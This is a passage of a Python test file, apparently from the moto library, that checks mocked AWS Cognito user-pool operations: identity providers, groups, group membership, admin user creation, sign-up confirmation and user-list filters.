conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) 
result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_list_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) result = conn.list_identity_providers(UserPoolId=user_pool_id, MaxResults=10) result["Providers"].should.have.length_of(1) result["Providers"][0]["ProviderName"].should.equal(provider_name) result["Providers"][0]["ProviderType"].should.equal(provider_type) @mock_cognitoidp def test_list_identity_providers_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["Providers"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = identity_provider_count + 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(identity_provider_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = 
str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_update_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderDetails={"thing": new_value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(new_value) @mock_cognitoidp def test_update_identity_provider_no_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId="foo", ProviderName="bar", ProviderDetails={"thing": new_value} ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_update_identity_provider_no_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName="foo", ProviderDetails={"thing": new_value}, ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_delete_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) conn.delete_identity_provider(UserPoolId=user_pool_id, ProviderName=provider_name) caught = False try: conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name 
= str(uuid.uuid4()) description = str(uuid.uuid4()) role_arn = "arn:aws:iam:::role/my-iam-role" precedence = random.randint(0, 100000) result = conn.create_group( GroupName=group_name, UserPoolId=user_pool_id, Description=description, RoleArn=role_arn, Precedence=precedence, ) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["Description"].should.equal(description) result["Group"]["RoleArn"].should.equal(role_arn) result["Group"]["Precedence"].should.equal(precedence) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_create_group_with_duplicate_name_raises_error(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) with pytest.raises(ClientError) as cm: conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.operation_name.should.equal("CreateGroup") cm.value.response["Error"]["Code"].should.equal("GroupExistsException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_get_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_list_groups(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.list_groups(UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_delete_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected with pytest.raises(ClientError) as cm: conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_add_user_to_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_with_username_attributes(): conn = 
boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) # should there be an assertion here? @mock_cognitoidp def test_list_users_in_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) @mock_cognitoidp def test_list_users_in_group_ignores_deleted_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) username2 = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username2) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username2, GroupName=group_name ) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username2) @mock_cognitoidp def test_admin_list_groups_for_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_with_username_attribute(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = 
conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_ignores_deleted_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) group_name2 = str(uuid.uuid4()) conn.create_group(GroupName=group_name2, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name2 ) conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name2) @mock_cognitoidp def test_admin_remove_user_from_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = 
conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"]
    group_name = str(uuid.uuid4())
    conn.create_group(GroupName=group_name, UserPoolId=user_pool_id)

    username = str(uuid.uuid4())
    conn.admin_create_user(UserPoolId=user_pool_id, Username=username)

    # The test name says "remove ... again is noop", so exercise the remove API:
    # removing a user that is not (or no longer) in the group should not raise
    conn.admin_remove_user_from_group(
        UserPoolId=user_pool_id, Username=username, GroupName=group_name
    )
    conn.admin_remove_user_from_group(
        UserPoolId=user_pool_id, Username=username, GroupName=group_name
    )


@mock_cognitoidp
def test_admin_create_user():
    conn = boto3.client("cognito-idp", "us-west-2")

    username = str(uuid.uuid4())
    value = str(uuid.uuid4())
    user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"]
    result = conn.admin_create_user(
        UserPoolId=user_pool_id,
        Username=username,
        UserAttributes=[{"Name": "thing", "Value": value}],
    )

    result["User"]["Username"].should.equal(username)
    result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD")
    result["User"]["Attributes"].should.have.length_of(2)

    def _verify_attribute(name, v):
        attr = [a for a in result["User"]["Attributes"] if a["Name"] == name]
        attr.should.have.length_of(1)
        attr[0]["Value"].should.equal(v)

    _verify_attribute("thing", value)
    result["User"]["Enabled"].should.equal(True)


@mock_cognitoidp
def test_admin_create_user_with_username_attributes():
    conn = boto3.client("cognito-idp", "us-west-2")

    username = "test@example.com"
    value = str(uuid.uuid4())
    user_pool_id = conn.create_user_pool(
        PoolName=str(uuid.uuid4()), UsernameAttributes=["email"]
    )["UserPool"]["Id"]
    result = conn.admin_create_user(
        UserPoolId=user_pool_id,
        Username=username,
        UserAttributes=[{"Name": "thing", "Value": value}],
    )

    result["User"]["Username"].should_not.equal(username)
    result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD")
    result["User"]["Attributes"].should.have.length_of(3)

    def _verify_attribute(name, v):
        attr = [a for a in result["User"]["Attributes"] if a["Name"] == name]
        attr.should.have.length_of(1)
        attr[0]["Value"].should.equal(v)

    _verify_attribute("thing", value)
    _verify_attribute("email", username)
    result["User"]["Enabled"].should.equal(True)


@mock_cognitoidp
def test_admin_create_user_with_incorrect_username_attribute_type_fails():
    conn = boto3.client("cognito-idp", "us-west-2")

    value = str(uuid.uuid4())
    user_pool_id = conn.create_user_pool(
        PoolName=str(uuid.uuid4()), UsernameAttributes=["email"]
    )["UserPool"]["Id"]

    with pytest.raises(ClientError) as ex:
        username = str(uuid.uuid4())
        conn.admin_create_user(
            UserPoolId=user_pool_id,
            Username=username,
            UserAttributes=[{"Name": "thing", "Value": value}],
        )

    err = ex.value.response["Error"]
    err["Code"].should.equal("InvalidParameterException")
    err["Message"].should.equal("Username should be either an email or a phone number.")


@mock_cognitoidp
def test_admin_create_user_with_existing_username_attribute_fails():
    conn = boto3.client("cognito-idp", "us-west-2")

    value = str(uuid.uuid4())
    user_pool_id = conn.create_user_pool(
        PoolName=str(uuid.uuid4()), UsernameAttributes=["email"]
    )["UserPool"]["Id"]

    username = "test@example.com"
    conn.admin_create_user(
        UserPoolId=user_pool_id,
        Username=username,
        UserAttributes=[{"Name": "thing", "Value": value}],
    )

    with pytest.raises(ClientError) as ex:
        username = "test@example.com"
        conn.admin_create_user(
            UserPoolId=user_pool_id,
            Username=username,
            UserAttributes=[{"Name": "thing", "Value": value}],
        )

    err = ex.value.response["Error"]
    err["Code"].should.equal("UsernameExistsException")
    err["Message"].should.equal("test@example.com")


@mock_cognitoidp
def 
test_admin_create_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) password = "Passw0rd!" user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=False )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("UNCONFIRMED") conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username,) user["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_admin_resend_invitation_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.false @mock_cognitoidp def test_admin_resend_invitation_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def 
test_admin_get_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) @mock_cognitoidp def test_admin_get_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "thing", "Value": value}, {"Name": "phone_number", "Value": "+123456789"}, ], ) # verify user can be queried by email result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify user can be queried by phone number result = conn.admin_get_user(UserPoolId=user_pool_id, Username="+123456789") result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify that the generate user sub is a valid UUID v4 [user_sub] = [ attr["Value"] for attr in result["UserAttributes"] if attr["Name"] == "sub" ] uuid.UUID(user_sub) # verify user should be queried by user sub result = conn.admin_get_user(UserPoolId=user_pool_id, Username=user_sub) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") @mock_cognitoidp def test_admin_get_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_missing_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_get_user(): conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") result = conn.get_user(AccessToken=outputs["access_token"]) result["Username"].should.equal(outputs["username"]) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in 
result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) for key, value in outputs["additional_fields"].items(): _verify_attribute(key, value) @mock_cognitoidp def test_get_user_unknown_accesstoken(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.get_user(AccessToken="n/a") err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Invalid token") @mock_cognitoidp def test_list_users(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) username_bis = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) user0_username = "user0@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=user0_username, UserAttributes=[{"Name": "phone_number", "Value": "+48555555555"}], ) # checking Filter with prefix operator result = conn.list_users(UserPoolId=user_pool_id, Filter='phone_number ^= "+48"') result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(user0_username) # empty value Filter should also be supported result = conn.list_users(UserPoolId=user_pool_id, Filter='family_name=""') result["Users"].should.have.length_of(0) @mock_cognitoidp def test_list_users_incorrect_filter(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username = foo") _assert_filter_parsing_error(exc) with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username=") _assert_filter_parsing_error(exc) def _assert_filter_parsing_error(exc): err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Error while parsing filter") @mock_cognitoidp def test_list_users_invalid_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter='custom:foo = "bar"') err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Invalid search attribute: custom:foo") @mock_cognitoidp def test_list_users_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] 
